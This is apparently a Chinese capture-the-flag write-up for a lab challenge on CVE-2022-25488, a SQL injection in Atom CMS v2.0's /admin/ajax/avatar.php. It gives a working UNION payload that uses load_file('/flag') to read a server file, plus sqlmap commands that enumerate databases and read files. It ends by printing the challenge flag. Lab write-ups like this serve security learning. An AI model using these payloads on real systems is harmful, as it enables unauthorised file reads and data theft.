春秋云镜：CVE-2022-25488（SQL报错注入）

目录

一、题目

二、sqlmap梭哈查flag

一、题目

介绍：

Atom CMS v2.0存在sql注入漏洞在/admin/ajax/avatar.php页面

进入题目;

发现是Not Found页面 一开始以为打开的问题：

 一想 我们要访问的是/admin/ajax/avatar.php

访问后是空白页面：

查看前端源码：

 测试一下注入点?id=1

源码发生了变化：

 试试id=1'

源码没有变化：

在次验证一下   id=1 and 1=1 

字符型注入没错了

 由于flag没有在数据库的库名中显示，所以我们直接报错注入就好。

sql报错注入： 

 http://xxx.ichunqiu.com/admin/ajax/avatar.php?id=-1 union (select load_file('/flag'))#

id=1 and 1=2 也可以 主要让id的语法错误 回显出来flag

二、sqlmap梭哈查flag

设置id=1 爆库 

python sqlmap.py -u http://xxx.ichunqiu.com/admin/ajax/avatar.php?id=1 --batch -dbs

 虽然爆出来了 但是没有flag表

因为i春秋靶场默认flag就在根目录 我们可以直接查找/flag文件：

python sqlmap.py -u http://xxx.ichunqiu.com/admin/ajax/avatar.php?id=1 --batch --file-read "/flag" --dbms mysql

跑出来会存在sqlmap的目录： 

 查看一下： 

  flag{6d6a2570-99f2-402f-aeb2-bb9b6da68247}